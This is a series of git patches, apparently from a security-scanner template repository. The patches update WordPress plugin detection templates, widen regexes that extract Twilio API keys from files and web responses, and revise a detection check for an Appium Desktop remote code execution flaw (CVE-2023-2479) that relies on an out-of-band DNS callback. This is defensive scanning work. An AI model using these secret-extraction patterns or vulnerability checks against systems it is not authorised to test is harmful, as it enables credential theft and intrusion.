     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 1c1c690fcd..22f812e2b8 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index 4d6702d81a..c637006d26 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index 42cb8bc409..e020507ccb 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index 55d6effbf5..c92903fd79 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
+    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index 6786cab703..c25b2c1c48 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 784ba22c8a..4d6dd14d25 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 72ff55e58a..7ca0870ed6 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
+    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 8cfaa0f5a9..4f0d9be568 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index 85900a01a7..f3c481b824 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
+    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index a7ccde0b49..ba214fd7ea 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
+    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 422664a98c..8f5fe8d9a5 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index f0af3a748a..0458b13354 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
+    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index f89f1a20b3..d570be07bf 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
+    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index 01fb12d0ad..ee05e3add8 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
+    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index 1773857e15..df2487955f 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
+    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index bcd1509c68..79ff01211c 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
+    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index c6aca20a60..23414b3d1d 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
index 56dfdf4a59..fba45020e4 100644
--- a/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
+++ b/http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reviews-plugin-for-google/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reviews-plugin-for-google
     wpscan: https://wpscan.com/plugin/wp-reviews-plugin-for-google
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-rollback.yaml b/http/technologies/wordpress/plugins/wp-rollback.yaml
index 810fc82cde..0178c8e9fb 100644
--- a/http/technologies/wordpress/plugins/wp-rollback.yaml
+++ b/http/technologies/wordpress/plugins/wp-rollback.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-rollback/
   metadata:
+    max-request: 1
     plugin_namespace: wp-rollback
     wpscan: https://wpscan.com/plugin/wp-rollback
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-seopress.yaml b/http/technologies/wordpress/plugins/wp-seopress.yaml
index 2276545093..017cf76f11 100644
--- a/http/technologies/wordpress/plugins/wp-seopress.yaml
+++ b/http/technologies/wordpress/plugins/wp-seopress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-seopress/
   metadata:
+    max-request: 1
     plugin_namespace: wp-seopress
     wpscan: https://wpscan.com/plugin/wp-seopress
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
index 783d381ed8..a04ddc6003 100644
--- a/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
+++ b/http/technologies/wordpress/plugins/wp-sitemap-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-sitemap-page/
   metadata:
+    max-request: 1
     plugin_namespace: wp-sitemap-page
     wpscan: https://wpscan.com/plugin/wp-sitemap-page
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-smushit.yaml b/http/technologies/wordpress/plugins/wp-smushit.yaml
index 27f6d46c2b..bc83478f06 100644
--- a/http/technologies/wordpress/plugins/wp-smushit.yaml
+++ b/http/technologies/wordpress/plugins/wp-smushit.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-smushit/
   metadata:
+    max-request: 1
     plugin_namespace: wp-smushit
     wpscan: https://wpscan.com/plugin/wp-smushit
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-statistics.yaml b/http/technologies/wordpress/plugins/wp-statistics.yaml
index ab61cc0338..dedd2e23b6 100644
--- a/http/technologies/wordpress/plugins/wp-statistics.yaml
+++ b/http/technologies/wordpress/plugins/wp-statistics.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-statistics/
   metadata:
+    max-request: 1
     plugin_namespace: wp-statistics
     wpscan: https://wpscan.com/plugin/wp-statistics
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-super-cache.yaml b/http/technologies/wordpress/plugins/wp-super-cache.yaml
index 5f6fbc1f75..03cd7137a8 100644
--- a/http/technologies/wordpress/plugins/wp-super-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-super-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-super-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-super-cache
     wpscan: https://wpscan.com/plugin/wp-super-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-user-avatar.yaml b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
index d67150d038..a68d4b7d78 100644
--- a/http/technologies/wordpress/plugins/wp-user-avatar.yaml
+++ b/http/technologies/wordpress/plugins/wp-user-avatar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-user-avatar/
   metadata:
+    max-request: 1
     plugin_namespace: wp-user-avatar
     wpscan: https://wpscan.com/plugin/wp-user-avatar
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
index beeba7ca69..bf9dfc3ad8 100644
--- a/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-recaptcha/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-recaptcha
     wpscan: https://wpscan.com/plugin/wpcf7-recaptcha
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
index c225df7bfd..47911a86a5 100644
--- a/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
+++ b/http/technologies/wordpress/plugins/wpcf7-redirect.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpcf7-redirect/
   metadata:
+    max-request: 1
     plugin_namespace: wpcf7-redirect
     wpscan: https://wpscan.com/plugin/wpcf7-redirect
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wpforms-lite.yaml b/http/technologies/wordpress/plugins/wpforms-lite.yaml
index aaad04cb76..1c25b6f488 100644
--- a/http/technologies/wordpress/plugins/wpforms-lite.yaml
+++ b/http/technologies/wordpress/plugins/wpforms-lite.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpforms-lite/
   metadata:
+    max-request: 1
     plugin_namespace: wpforms-lite
     wpscan: https://wpscan.com/plugin/wpforms-lite
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wps-hide-login.yaml b/http/technologies/wordpress/plugins/wps-hide-login.yaml
index ff750a7d2a..b36317acd8 100644
--- a/http/technologies/wordpress/plugins/wps-hide-login.yaml
+++ b/http/technologies/wordpress/plugins/wps-hide-login.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wps-hide-login/
   metadata:
+    max-request: 1
     plugin_namespace: wps-hide-login
     wpscan: https://wpscan.com/plugin/wps-hide-login
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
index f1e7595ccd..5eb35dd17e 100644
--- a/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
+++ b/http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wpvivid-backuprestore/
   metadata:
+    max-request: 1
     plugin_namespace: wpvivid-backuprestore
     wpscan: https://wpscan.com/plugin/wpvivid-backuprestore
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
index 4b2769ee46..ceb2b8d600 100644
--- a/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
+++ b/http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/yith-woocommerce-wishlist/
   metadata:
+    max-request: 1
     plugin_namespace: yith-woocommerce-wishlist
     wpscan: https://wpscan.com/plugin/yith-woocommerce-wishlist
   tags: tech,wordpress,wp-plugin,top-100,top-200

From e0c79e9609ea4cf06919f85977339c540121af3d Mon Sep 17 00:00:00 2001
From: sank 
Date: Tue, 26 Sep 2023 11:53:59 +0545
Subject: [PATCH 0525/1090] my template extracts all the keys if the word
 twilio is present.

---
 file/keys/twilio-api.yaml                        | 4 ++--
 http/exposures/tokens/twilio/twilio-api-key.yaml | 2 +-
 2 files changed, 3 insertions(+), 3 deletions(-)

diff --git a/file/keys/twilio-api.yaml b/file/keys/twilio-api.yaml
index 9895746a8a..34b11d04a5 100644
--- a/file/keys/twilio-api.yaml
+++ b/file/keys/twilio-api.yaml
@@ -2,7 +2,7 @@ id: twilio-api
 
 info:
   name: Twilio API Key
-  author: gaurang
+  author: gaurang, shankar acharya
   severity: high
   tags: token,file
 
@@ -13,4 +13,4 @@ file:
     extractors:
       - type: regex
         regex:
-          - "(?i)twilio(.{0,20})?SK[0-9a-f]{32}"
\ No newline at end of file
+          - "(?i)twilio(.{0,20})?[0-9a-f]{32,34}"
\ No newline at end of file
diff --git a/http/exposures/tokens/twilio/twilio-api-key.yaml b/http/exposures/tokens/twilio/twilio-api-key.yaml
index 1817e57b89..9d5fea9766 100644
--- a/http/exposures/tokens/twilio/twilio-api-key.yaml
+++ b/http/exposures/tokens/twilio/twilio-api-key.yaml
@@ -20,4 +20,4 @@ http:
       - type: regex
         part: body
         regex:
-          - '(?i)twilio.{0,20}\b(sk[a-f0-9]{32})\b'
\ No newline at end of file
+          - '(?i)twilio.{0,20}\b[a-f0-9]{32,34})\b'
\ No newline at end of file

From d5046b1dae287b2c5cc0d72919970627c2f7a970 Mon Sep 17 00:00:00 2001
From: shankar acharya <34772838+5hank4r@users.noreply.github.com>
Date: Tue, 26 Sep 2023 12:30:07 +0545
Subject: [PATCH 0526/1090] Update twilio-api-key.yaml

---
 http/exposures/tokens/twilio/twilio-api-key.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/exposures/tokens/twilio/twilio-api-key.yaml b/http/exposures/tokens/twilio/twilio-api-key.yaml
index 9d5fea9766..1d32c3facd 100644
--- a/http/exposures/tokens/twilio/twilio-api-key.yaml
+++ b/http/exposures/tokens/twilio/twilio-api-key.yaml
@@ -20,4 +20,4 @@ http:
       - type: regex
         part: body
         regex:
-          - '(?i)twilio.{0,20}\b[a-f0-9]{32,34})\b'
\ No newline at end of file
+          - '(?i)twilio.{0,20}[a-f0-9]{32,34}'

From f06822363f4c228abe306dda4b8596ba9c049dea Mon Sep 17 00:00:00 2001
From: shankar acharya <34772838+5hank4r@users.noreply.github.com>
Date: Tue, 26 Sep 2023 12:30:36 +0545
Subject: [PATCH 0527/1090] Update twilio-api-key.yaml

---
 http/exposures/tokens/twilio/twilio-api-key.yaml | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/http/exposures/tokens/twilio/twilio-api-key.yaml b/http/exposures/tokens/twilio/twilio-api-key.yaml
index 1d32c3facd..6467fb6b20 100644
--- a/http/exposures/tokens/twilio/twilio-api-key.yaml
+++ b/http/exposures/tokens/twilio/twilio-api-key.yaml
@@ -2,7 +2,7 @@ id: twilio-api-key
 
 info:
   name: Twilio API Key
-  author: DhiyaneshDK
+  author: DhiyaneshDK, Shankar Acharya
   severity: info
   reference:
     - https://github.com/praetorian-inc/noseyparker/blob/main/data/default/rules/twilio.yml

From ae67cf87ba6fac76bc89a70d92e4a2b0108d04da Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Tue, 26 Sep 2023 12:33:31 +0530
Subject: [PATCH 0528/1090] minor update

---
 http/cves/2023/CVE-2023-2479.yaml | 46 ++++++++++++++-----------------
 1 file changed, 20 insertions(+), 26 deletions(-)

diff --git a/http/cves/2023/CVE-2023-2479.yaml b/http/cves/2023/CVE-2023-2479.yaml
index 54d902d607..4400dbfcef 100644
--- a/http/cves/2023/CVE-2023-2479.yaml
+++ b/http/cves/2023/CVE-2023-2479.yaml
@@ -1,53 +1,47 @@
 id: CVE-2023-2479
 
 info:
-  name: Zero Click Remote Code Execution on Appium Desktop Server
-  author: zn9988, Aden Yap Chuen Zhen (chuenzhen.yap2@baesystems.com)
-  severity: Critical
-  description: Appium Desktop Server is susceptible to an unauthenticated remote code execution vulnerability.
+  name: Appium Desktop Server - Remote Code Execution
+  author: zn9988
+  severity: critical
+  description: |
+    OS Command Injection in GitHub repository appium/appium-desktop prior to v1.22.3-4.
+  remediation: Fixed in v1.22.3-4
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2023-2479
+    cwe-id: CWE-78
+    epss-score: 0.0008
+    epss-percentile: 0.3333
+    cpe: cpe:2.3:a:appium:appium-desktop:*:*:*:*:*:*:*:*
   reference: 
     - https://nvd.nist.gov/vuln/detail/CVE-2023-2479
     - https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4/
-  tags: http,rce,dast,oast,cve,electron
+  tags: cve,cve2023,appium,oast,rce
 
-requests:
+http:
   - method: GET
     path:
       - '{{BaseURL}}/?url='
       
     matchers-condition: and
     matchers:
-          # Response String
+      - type: word
+        part: interactsh_protocol
+        words:
+          - "dns"
+
         - type: word
           part: body
           words: 
             - "The requested resource could not be found, or a request was received using an HTTP method that is not supported by the mapped resource"
 
-          # Status Code
-        - type: status
-          status:
-            - 404
-            
-          # Content Type
         - type: word
           part: header
           words:
             - "application/json"
 
-          # Response Header
-        - type: word
-          part: header
-          words:
-            - "X-Powered-By: Express"
-        
-          # Captured the interact callbacks
-        - type: word
-          part: interactsh_protocol
-          condition: or
-          words:
-            - "dns"
-            - "http" 
+        - type: status
+          status:
+            - 404

From 6d40f1256dc7d65bd7c03ad42de5e38f228191d6 Mon Sep 17 00:00:00 2001
From: Dhiyaneshwaran 
Date: Tue, 26 Sep 2023 12:42:57 +0530
Subject: [PATCH 0529/1090] fix trail space

---
 http/cves/2023/CVE-2023-2479.yaml | 32 +++++++++++++++----------------
 1 file changed, 16 insertions(+), 16 deletions(-)

diff --git a/http/cves/2023/CVE-2023-2479.yaml b/http/cves/2023/CVE-2023-2479.yaml
index 4400dbfcef..3fa45b321e 100644
--- a/http/cves/2023/CVE-2023-2479.yaml
+++ b/http/cves/2023/CVE-2023-2479.yaml
@@ -15,7 +15,7 @@ info:
     epss-score: 0.0008
     epss-percentile: 0.3333
     cpe: cpe:2.3:a:appium:appium-desktop:*:*:*:*:*:*:*:*
-  reference: 
+  reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2023-2479
     - https://huntr.dev/bounties/fbdeec3c-d197-4a68-a547-7f93fb9594b4/
   tags: cve,cve2023,appium,oast,rce
@@ -24,24 +24,24 @@ http:
   - method: GET
     path:
       - '{{BaseURL}}/?url='
-      
+
     matchers-condition: and
     matchers:
       - type: word
-        part: interactsh_protocol
+        part: body
+        words:
+          - 'The requested resource could not be found, or a request was received using an HTTP method that is not supported by the mapped resource'
+
+      - type: word
+        part: header
+        words:
+          - 'application/json'
+
+      - type: word
+        part: interactsh_protocol # Confirms the DNS Interaction
         words:
           - "dns"
 
-        - type: word
-          part: body
-          words: 
-            - "The requested resource could not be found, or a request was received using an HTTP method that is not supported by the mapped resource"
-
-        - type: word
-          part: header
-          words:
-            - "application/json"
-
-        - type: status
-          status:
-            - 404
+      - type: status
+        status:
+          - 404

From 8d21d87b1cf966d1124bb26a468f00dcc991a167 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 26 Sep 2023 13:15:11 +0000
Subject: [PATCH 0530/1090] Auto Generated New Template Addition List [Tue Sep
 26 13:15:11 UTC 2023] :robot:

---
 .new-additions | 1 +
 1 file changed, 1 insertion(+)

diff --git a/.new-additions b/.new-additions
index 20334ee2f3..60a64e9e4d 100644
--- a/.new-additions
+++ b/.new-additions
@@ -2,6 +2,7 @@ http/cves/2023/CVE-2023-2766.yaml
 http/cves/2023/CVE-2023-42442.yaml
 http/cves/2023/CVE-2023-4568.yaml
 http/exposures/tokens/jotform/jotform-api-key.yaml
+http/misconfiguration/installer/akeeba-installer.yaml
 http/misconfiguration/installer/alma-installer.yaml
 http/misconfiguration/installer/gibbon-installer.yaml
 http/misconfiguration/installer/mantisbt-installer.yaml

From 2f28b0ac1a589ce6fa938ef35aa52fcf7e254586 Mon Sep 17 00:00:00 2001
From: GitHub Action 
Date: Tue, 26 Sep 2023 13:15:21 +0000
Subject: [PATCH 0531/1090] Auto Generated Templates Checksum [Tue Sep 26
 13:15:21 UTC 2023] :robot:

---
 templates-checksum.txt | 405 +++++++++++++++++++++--------------------
 1 file changed, 203 insertions(+), 202 deletions(-)

diff --git a/templates-checksum.txt b/templates-checksum.txt
index 061da517a0..014c3b9703 100644
--- a/templates-checksum.txt
+++ b/templates-checksum.txt
@@ -1372,7 +1372,7 @@ http/cves/2019/CVE-2019-8451.yaml:bd293e0019c05ca1eb75b15375e515f62028c8a1
 http/cves/2019/CVE-2019-8903.yaml:065eb7adbbe9e34a9beab5d8e47d839c532d7b12
 http/cves/2019/CVE-2019-8937.yaml:24506c0b3e74f252122225127b8dbd0aa1ae990f
 http/cves/2019/CVE-2019-8982.yaml:03c6b13d8fb7d84ed16d4cf78641dbb09b28838b
-http/cves/2019/CVE-2019-9041.yaml:aa7ee0138a405d422b66fa5be8e3ca884a489402
+http/cves/2019/CVE-2019-9041.yaml:271951504d7b48ad90d8c382f344423773046aa2
 http/cves/2019/CVE-2019-9618.yaml:fa560583a637ecc2b15cf254f68579b6694bceea
 http/cves/2019/CVE-2019-9670.yaml:34282f9e0ee2de7bbb04f155a52575f85c5d7e4d
 http/cves/2019/CVE-2019-9726.yaml:e6148d1f1c420bea11a4e7f5310e2cdceae3238e
@@ -4473,6 +4473,7 @@ http/misconfiguration/httponly-cookie-detect.yaml:c64d772ea2b1baebf90eb45d17b948
 http/misconfiguration/ibm-friendly-path-exposure.yaml:02e17960b936d9497f8673629bf5c75000e1f633
 http/misconfiguration/ibm-websphere-xml.yaml:8b457d337cb671b938b8dee1743b2ba009689b7b
 http/misconfiguration/installer/acunetix-360-installer.yaml:08978fd91dcf0249d0d50ec692ea165e73a1342d
+http/misconfiguration/installer/akeeba-installer.yaml:0c84091a5d71cba4b967c5ad4d92eb146f40ef68
 http/misconfiguration/installer/alma-installer.yaml:1e6a778af0f1a917e09803fd3e523efdbd8d2258
 http/misconfiguration/installer/ampache-music-installer.yaml:28e4b0bedc08cbf5210559e43f440e444ad35820
 http/misconfiguration/installer/atlassian-bamboo-setup-wizard.yaml:46a5c397b2f9d57c2d7a7b8f2e3423835cc75d80
@@ -5854,218 +5855,218 @@ http/technologies/weblogic-detect.yaml:e7cd5e93e7dd6c1625553aa3ad3c5b47e9bfb498
 http/technologies/werkzeug-debugger-detect.yaml:d840275037a23f116bab272b6d7658cd9156e8af
 http/technologies/wms-server-detect.yaml:45c90b9c1ebd969c113b5226d8714e38434a6813
 http/technologies/wondercms-detect.yaml:b485ce65e953f7a8d97fc2bdb7e8e81f9900b114
-http/technologies/wordpress/plugins/ad-inserter.yaml:f6e7f6ffa7889adea4d25065e99b592f729482ed
-http/technologies/wordpress/plugins/add-to-any.yaml:7b142b33ba32b11c48ff8313881a6ce6805d6bf1
-http/technologies/wordpress/plugins/admin-menu-editor.yaml:364449c7a34df835665302b9eca8dd8c83fada4e
+http/technologies/wordpress/plugins/ad-inserter.yaml:dcc200a556b9acbe534e1602320c36a7de790bdd
+http/technologies/wordpress/plugins/add-to-any.yaml:0a6b25111eae4afc694c46433e2c508ea2b90539
+http/technologies/wordpress/plugins/admin-menu-editor.yaml:8602eaf564f6138e2a37576450107bfddbe34a51
 http/technologies/wordpress/plugins/adminimize.yaml:3f8e114ab592d30a1d4195f22d46de3b9fc28ed0
-http/technologies/wordpress/plugins/advanced-custom-fields.yaml:5f663f06fb30dd885af3c87149ec7bddce2b7fc0
-http/technologies/wordpress/plugins/akismet.yaml:9459d684de796a26900072f65b9fbbb664bbfda5
-http/technologies/wordpress/plugins/all-404-redirect-to-homepage.yaml:65a31735844abbc42c6c38fb1b2ce66f3b70637e
